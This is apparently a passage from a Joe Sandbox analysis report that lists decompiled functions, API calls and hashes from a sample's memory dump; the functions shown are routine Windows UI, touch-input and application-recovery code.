        • Part of subcall function 009B0C13: EnableWindow.USER32(?,009A4695), ref: 009B0C24
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
      • String ID:
      • API String ID: 2169720751-0
      • Opcode ID: 870e250d4fac3e761b80fa793636e117225b3a847a750fb44cb6902791641f6d
      • Instruction ID: 7a2d8a44b383cad23a0b7e1452d13362af29a521f5d5e439f3b6ad24e156a1cb
      • Opcode Fuzzy Hash: 870e250d4fac3e761b80fa793636e117225b3a847a750fb44cb6902791641f6d
      • Instruction Fuzzy Hash: 3721C171200708AFCB219F64CCC8BAB7BA9FFC5714F244519F5CA861A1DB75A8818BD1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009ACC36 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 79libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 65%
      			E009ACC36(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				struct HINSTANCE__* _t25;
				void* _t29;
				signed int _t31;
				struct HINSTANCE__* _t36;
				intOrPtr* _t38;
				signed int _t46;
				void* _t52;
				void* _t53;

				_t39 = __ecx;
				_push(0);
				E00AAD232(0xac7fd1, __ebx, __edi, __esi);
				_t38 = __ecx;
				_t49 =  *(_t53 + 8) & 0x0000ffff;
				if(_t49 == 0) {
					L16:
					_t23 = E009AC865(_t38, _t39, _t49, __eflags);
				} else {
					_t56 =  *0xd0fb50 & 0x00000001;
					if(( *0xd0fb50 & 0x00000001) == 0) {
						 *0xd0fb50 =  *0xd0fb50 | 0x00000001;
						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
						_push("user32.dll");
						_t36 = E009AB6E5(__ecx, __esi, _t56);
						 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
						_pop(_t39);
						 *0xd0fb4c = _t36;
					}
					_t25 =  *0xd0fb4c; // 0x0
					if(_t25 == 0) {
						_t25 = E009B8782(_t39);
					}
					if(( *0xd0fb50 & 0x00000002) == 0) {
						 *0xd0fb50 =  *0xd0fb50 | 0x00000002;
						 *0xd0fb48 = GetProcAddress(_t25, "GetTouchInputInfo");
					}
					if(( *0xd0fb50 & 0x00000004) == 0) {
						 *0xd0fb50 =  *0xd0fb50 | 0x00000004;
						 *0xd0fb44 = GetProcAddress( *0xd0fb4c, "CloseTouchInputHandle");
					}
					if( *0xd0fb48 == 0) {
						L15:
						_t39 = _t38;
						goto L16;
					} else {
						_t64 =  *0xd0fb44;
						if( *0xd0fb44 == 0) {
							goto L15;
						} else {
							_t46 = 0x28;
							_t52 = E009A6291(_t64,  ~(0 | _t64 > 0x00000000) | _t49 * _t46);
							if(_t52 == 0) {
								goto L15;
							} else {
								_t29 =  *0xd0fb48( *((intOrPtr*)(_t53 + 0xc)), _t49, _t52, 0x28);
								_t39 = _t38;
								if(_t29 == 0) {
									goto L16;
								} else {
									_t31 =  *((intOrPtr*)( *_t38 + 0x128))(_t49, _t52);
									_t49 = _t31;
									E009A62C0();
									 *0xd0fb44( *((intOrPtr*)(_t53 + 0xc)), _t52);
									if(_t31 == 0) {
										goto L15;
									} else {
										_t23 = 0;
									}
								}
							}
						}
					}
				}
				return E00AAD30A(_t23);
			}












      0x009acc36
      0x009acc36
      0x009acc3d
      0x009acc42
      0x009acc44
      0x009acc4a
      0x009acd33
      0x009acd33
      0x009acc50
      0x009acc50
      0x009acc57
      0x009acc59
      0x009acc60
      0x009acc64
      0x009acc69
      0x009acc6e
      0x009acc72
      0x009acc73
      0x009acc73
      0x009acc78
      0x009acc7f
      0x009acc81
      0x009acc81
      0x009acc93
      0x009acc95
      0x009acca4
      0x009acca4
      0x009accb0
      0x009accb2
      0x009accc6
      0x009accc6
      0x009accd2
      0x009acd31
      0x009acd31
      0x00000000
      0x009accd4
      0x009accd4
      0x009accdb
      0x00000000
      0x009accdd
      0x009acce1
      0x009accf3
      0x009accf8
      0x00000000
      0x009accfa
      0x009acd01
      0x009acd07
      0x009acd0b
      0x00000000
      0x009acd0d
      0x009acd11
      0x009acd18
      0x009acd1a
      0x009acd23
      0x009acd2b
      0x00000000
      0x009acd2d
      0x009acd2d
      0x009acd2d
      0x009acd2b
      0x009acd0b
      0x009accf8
      0x009accdb
      0x009accd2
      0x009acd3d

      APIs
      • __EH_prolog3.LIBCMT ref: 009ACC3D
      • GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 009ACCA2
      • GetProcAddress.KERNEL32(CloseTouchInputHandle,00000000), ref: 009ACCC4
        • Part of subcall function 009AB6E5: ActivateActCtx.KERNEL32(?,?,00B0BAF0,00000010,009ABB5C,user32.dll,00000000,009ACA56,00000000,00000000), ref: 009AB705
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$ActivateH_prolog3
      • String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
      • API String ID: 1001276555-1853737257
      • Opcode ID: 9edf7aad1b963a89916876f54ddd0f3e89594e3c8e652f10fcea224d7fce80a0
      • Instruction ID: 8790a1d6c4698f2a7734c131bd8bfec29493d7bfe82cb12f7cc37f9d0de6773e
      • Opcode Fuzzy Hash: 9edf7aad1b963a89916876f54ddd0f3e89594e3c8e652f10fcea224d7fce80a0
      • Instruction Fuzzy Hash: 8A21D6B16013419BD734AB74DE297297FA8AB56B60F25453DE809DB7E1CB749800CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AA887 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
      Download Yara Rule
      APIs
      • GetParent.USER32(0000E900), ref: 009AA8A9
      • GetWindowRect.USER32 ref: 009AA8CD
      • ScreenToClient.USER32 ref: 009AA8E0
      • ScreenToClient.USER32 ref: 009AA8E9
      • EqualRect.USER32 ref: 009AA8F0
      • DeferWindowPos.USER32(?,009AD1D8,00000000,?,?,?,?,00000014), ref: 009AA91A
      • SetWindowPos.USER32(009AD1D8,00000000,?,?,?,?,00000014,?,009AD1D8,00000000,00000000,0000E900,?,00000001), ref: 009AA924
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$ClientRectScreen$DeferEqualParent
      • String ID:
      • API String ID: 443303494-0
      • Opcode ID: 43e74df6190955fda62c44a4f9881958b5e5c7769401339c9254c73fbb285a2b
      • Instruction ID: d490ee03130c6d467aa86716b8413969d6fe29d0adf6ec168313c548468d9c71
      • Opcode Fuzzy Hash: 43e74df6190955fda62c44a4f9881958b5e5c7769401339c9254c73fbb285a2b
      • Instruction Fuzzy Hash: 9821E275900209EFDB04DFA4DC849AFBBB9FF48300B11852AE916D3254E7349905CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BBBB9 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
      Download Yara Rule
      C-Code - Quality: 63%
      			E009BBBB9(void* __edi, struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				signed int _v8;
				struct tagRECT _v24;
				signed int _v28;
				struct tagPOINT _v36;
				void* __esi;
				signed int _t26;
				struct tagPOINT _t28;
				signed int _t29;
				signed int _t39;
				void* _t43;
				intOrPtr _t44;
				signed int _t45;
				void* _t48;
				struct HWND__* _t51;
				signed int _t52;

				_t49 = __edi;
				_t26 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t26 ^ _t52;
				_t44 = _a12;
				_t28 = _a8;
				_t51 = _a4;
				_push(_t44);
				_v36.x = _t28;
				_v36.y = _t44;
				_t29 = RealChildWindowFromPoint(_t51, _t28);
				_t45 = _t29;
				_v28 = _t45;
				if(_t45 == 0) {
					_push(__edi);
					ClientToScreen(_t51,  &_v36);
					_push(5);
					while(1) {
						_t51 = GetWindow(_t51, ??);
						if(_t51 == 0) {
							break;
						}
						if(GetDlgCtrlID(_t51) != 0xffff && (GetWindowLongA(_t51, 0xfffffff0) & 0x10000000) != 0) {
							_v24.left = _v24.left & 0x00000000;
							_v24.top = _v24.top & 0x00000000;
							_v24.right = _v24.right & 0x00000000;
							_v24.bottom = _v24.bottom & 0x00000000;
							GetWindowRect(_t51,  &_v24);
							_push(_v36.y);
							if(PtInRect( &_v24, _v36) != 0) {
								_v28 = _t51;
							}
						}
						_push(2);
					}
					_t39 = _v28;
					_pop(_t49);
					L10:
					return E00AAB46A(_t39, _t43, _v8 ^ _t52, _t48, _t49, _t51);
				}
				asm("sbb eax, eax");
				_t39 =  ~(_t29 - _t51) & _t45;
				goto L10;
			}


















      0x009bbbb9
      0x009bbbc1
      0x009bbbc8
      0x009bbbcb
      0x009bbbce
      0x009bbbd2
      0x009bbbd5
      0x009bbbd8
      0x009bbbdb
      0x009bbbde
      0x009bbbe4
      0x009bbbe6
      0x009bbbeb
      0x009bbbf7
      0x009bbbfd
      0x009bbc09
      0x009bbc5f
      0x009bbc62
      0x009bbc66
      0x00000000
      0x00000000
      0x009bbc19
      0x009bbc2b
      0x009bbc2f
      0x009bbc33
      0x009bbc37
      0x009bbc40
      0x009bbc46
      0x009bbc58
      0x009bbc5a
      0x009bbc5a
      0x009bbc58
      0x009bbc5d
      0x009bbc5d
      0x009bbc68
      0x009bbc6b
      0x009bbc6c
      0x009bbc78
      0x009bbc78
      0x009bbbf1
      0x009bbbf3
      0x00000000

      APIs
      • RealChildWindowFromPoint.USER32(?,?,?), ref: 009BBBDE
      • ClientToScreen.USER32(?,?), ref: 009BBBFD
      • GetWindow.USER32(?,00000005), ref: 009BBC60
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$ChildClientFromPointRealScreen
      • String ID:
      • API String ID: 2518355518-0
      • Opcode ID: d9ca6be3674fb9ebb0b5b64c83fa15899bae0fb5b4df967d08850eddc1f99a95
      • Instruction ID: 5100670e78244e8f7579034742c0d55546dbff9da7adbecdbffbb52a632922ae
      • Opcode Fuzzy Hash: d9ca6be3674fb9ebb0b5b64c83fa15899bae0fb5b4df967d08850eddc1f99a95
      • Instruction Fuzzy Hash: 5F21717291161AAFDB00CFA8DD09FFE7BB8EF09325F100119E512E2190DB789A01CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1888 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 55%
      			E009B1888(intOrPtr* __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				void* __ebp;
				intOrPtr* _t16;
				intOrPtr* _t21;
				struct HINSTANCE__* _t28;
				intOrPtr* _t29;
				void* _t35;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = __ecx;
				_t28 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t28 == 0) {
					E009B8782(_t23);
				}
				_t21 = GetProcAddress(_t28, "ApplicationRecoveryInProgress");
				_t29 = GetProcAddress(_t28, "ApplicationRecoveryFinished");
				if(_t21 != 0 && _t29 != 0) {
					_v8 = _v8 & 0x00000000;
					 *_t21( &_v8);
					if(_v8 == 0) {
						_t35 = 1;
						_t16 =  *((intOrPtr*)( *_v12 + 0xfc))();
						if(_t16 != 0) {
							_t35 =  *((intOrPtr*)( *_t16 + 0x38))();
						}
						 *_t29(_t35);
					}
				}
				return 0;
			}











      0x009b1888
      0x009b188d
      0x009b188e
      0x009b1897
      0x009b18a0
      0x009b18a4
      0x009b18a6
      0x009b18a6
      0x009b18bf
      0x009b18c3
      0x009b18c7
      0x009b18cd
      0x009b18d5
      0x009b18db
      0x009b18e4
      0x009b18e5
      0x009b18ed
      0x009b18f6
      0x009b18f6
      0x009b18f9
      0x009b18f9
      0x009b18db
      0x009b1901

      APIs
      • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 009B189A
      • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 009B18B7
      • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 009B18C1
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$Exception@8HandleModuleThrow
      • String ID: ApplicationRecoveryFinished$ApplicationRecoveryInProgress$KERNEL32.DLL
      • API String ID: 2144170044-4287352451
      • Opcode ID: d7e6d4710418f6a75d0856f4dd5cea6181536ce0b304889dee80f1d7800f7c7b
      • Instruction ID: 56004e74d87320f33dc82818572e9f12347ced880c1d13f64332969fe0a525ea
      • Opcode Fuzzy Hash: d7e6d4710418f6a75d0856f4dd5cea6181536ce0b304889dee80f1d7800f7c7b
      • Instruction Fuzzy Hash: 6501B136A00319AFC7109BB5C958AAF7BBCFF95360F15046AE502A3210DA74CD01C6A0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009ABB2C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E009ABB2C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				intOrPtr* _t23;
				struct HINSTANCE__* _t27;
				intOrPtr* _t30;
				void* _t32;
				void* _t35;

				_t29 = __ecx;
				_push(0);
				E00AAD232(0xac7f43, __ebx, __edi, __esi);
				_t32 = __ecx;
				 *(__ecx + 0x38) =  *(__ecx + 0x38) & 0x00000000;
				_t37 =  *0xd0fb40 & 0x00000001;
				if(( *0xd0fb40 & 0x00000001) == 0) {
					 *0xd0fb40 =  *0xd0fb40 | 0x00000001;
					 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
					_push("user32.dll");
					_t27 = E009AB6E5(__ecx, __esi, _t37);
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					_pop(_t29);
					 *0xd0fb3c = _t27;
				}
				_t20 =  *0xd0fb3c; // 0x0
				if(_t20 == 0) {
					_t20 = E009B8782(_t29);
				}
				if(( *0xd0fb40 & 0x00000002) == 0) {
					 *0xd0fb40 =  *0xd0fb40 | 0x00000002;
					 *0xd0fb38 = GetProcAddress(_t20, "RegisterTouchWindow");
				}
				if(( *0xd0fb40 & 0x00000004) == 0) {
					 *0xd0fb40 =  *0xd0fb40 | 0x00000004;
					 *0xd0fb34 = GetProcAddress( *0xd0fb3c, "UnregisterTouchWindow");
				}
				_t30 =  *0xd0fb38; // 0x0
				if(_t30 == 0) {
					L13:
					_t21 = 0;
					__eflags = 0;
					goto L14;
				} else {
					_t23 =  *0xd0fb34; // 0x0
					if(_t23 == 0) {
						goto L13;
					}
					if( *((intOrPtr*)(_t35 + 8)) != 0) {
						 *((intOrPtr*)(_t32 + 0x38)) =  *_t30( *((intOrPtr*)(_t32 + 0x20)),  *((intOrPtr*)(_t35 + 0xc)));
					} else {
						_t21 =  *_t23( *((intOrPtr*)(_t32 + 0x20)));
					}
					L14:
					return E00AAD30A(_t21);
				}
			}









      0x009abb2c
      0x009abb2c
      0x009abb33
      0x009abb38
      0x009abb3a
      0x009abb3e
      0x009abb45
      0x009abb47
      0x009abb4e
      0x009abb52
      0x009abb57
      0x009abb5c
      0x009abb60
      0x009abb61
      0x009abb61
      0x009abb66
      0x009abb6d
      0x009abb6f
      0x009abb6f
      0x009abb81
      0x009abb83
      0x009abb92
      0x009abb92
      0x009abb9e
      0x009abba0
      0x009abbb4
      0x009abbb4
      0x009abbb9
      0x009abbc1
      0x009abbe7
      0x009abbe7
      0x009abbe7
      0x00000000
      0x009abbc3
      0x009abbc3
      0x009abbca
      0x00000000
      0x00000000
      0x009abbd0
      0x009abbe2
      0x009abbd2
      0x009abbd5
      0x009abbd5
      0x009abbe9
      0x009abbee
      0x009abbee

      APIs
      • __EH_prolog3.LIBCMT ref: 009ABB33
      • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 009ABB90
      • GetProcAddress.KERNEL32(UnregisterTouchWindow,00000000), ref: 009ABBB2
        • Part of subcall function 009AB6E5: ActivateActCtx.KERNEL32(?,?,00B0BAF0,00000010,009ABB5C,user32.dll,00000000,009ACA56,00000000,00000000), ref: 009AB705
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$ActivateH_prolog3
      • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
      • API String ID: 1001276555-2470269259
      • Opcode ID: 748af15ccfe0c9c10dee47921f76986cb3659021f9e6682ead3a175b0a3d9c0e
      • Instruction ID: 9dc4f48d2be70a0907d4eb338d7d116742943199fec648b6af5cb7bcc27cdd7a
      • Opcode Fuzzy Hash: 748af15ccfe0c9c10dee47921f76986cb3659021f9e6682ead3a175b0a3d9c0e
      • Instruction Fuzzy Hash: 7011BFB0640301AFDB34EB60EE65B557BE4BB05328F204529E84AD2BB2CB749940CFB0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B181C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E009B181C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				void* _t12;
				intOrPtr* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				intOrPtr* _t18;

				_t16 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t16 == 0) {
					E009B8782(_t15);
				}
				_t14 = GetProcAddress(_t16, "RegisterApplicationRestart");
				_t18 = GetProcAddress(_t16, "RegisterApplicationRecoveryCallback");
				if(_t14 == 0 || _t18 == 0) {
					L7:
					return 0;
				}
				_t12 =  *_t14(_a4, _a8);
				if(_t12 == 0) {
					if(_a12 == _t12) {
						goto L7;
					}
					_t12 =  *_t18(_a12, _a16, _a20, _a24);
					if(_t12 == 0) {
						goto L7;
					}
				}
				return _t12;
			}









      0x009b182f
      0x009b1833
      0x009b1835
      0x009b1835
      0x009b184e
      0x009b1852
      0x009b1856
      0x009b187f
      0x00000000
      0x009b187f
      0x009b1862
      0x009b1866
      0x009b186b
      0x00000000
      0x00000000
      0x009b1879
      0x009b187d
      0x00000000
      0x00000000
      0x009b187d
      0x009b1885

      APIs
      • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 009B1829
      • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 009B1846
      • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 009B1850
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Strings
      • KERNEL32.DLL, xrefs: 009B1824
      • RegisterApplicationRestart, xrefs: 009B1840
      • RegisterApplicationRecoveryCallback, xrefs: 009B1848
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc$Exception@8HandleModuleThrow
      • String ID: KERNEL32.DLL$RegisterApplicationRecoveryCallback$RegisterApplicationRestart
      • API String ID: 2144170044-723216104
      • Opcode ID: 28e3e0542b6d37f596eb42b7e59ce221a5c0b603b92183fe9116e700a09581bc
      • Instruction ID: 307d63105f1bdd8955927021b0a8b97a6885c942220f3f1639346f1315f49dc3
      • Opcode Fuzzy Hash: 28e3e0542b6d37f596eb42b7e59ce221a5c0b603b92183fe9116e700a09581bc
      • Instruction Fuzzy Hash: 07F04F3650021ABB8F225FA69D50D9B3E6EFF947B47444023F91592110DB71CC21DAA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BE5AC Relevance: 10.5, APIs: 7, Instructions: 30COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009BE5AC(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





      0x009be5b8
      0x009be5be
      0x009be5c5
      0x009be5cc
      0x009be5d3
      0x009be5e0
      0x009be5e7
      0x009be5ea
      0x009be5ed
      0x009be5f1

      APIs
      • GetSysColor.USER32(0000000F), ref: 009BE5BA
      • GetSysColor.USER32(00000010), ref: 009BE5C1
      • GetSysColor.USER32(00000014), ref: 009BE5C8
      • GetSysColor.USER32(00000012), ref: 009BE5CF
      • GetSysColor.USER32(00000006), ref: 009BE5D6
      • GetSysColorBrush.USER32(0000000F), ref: 009BE5E3
      • GetSysColorBrush.USER32(00000006), ref: 009BE5EA
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
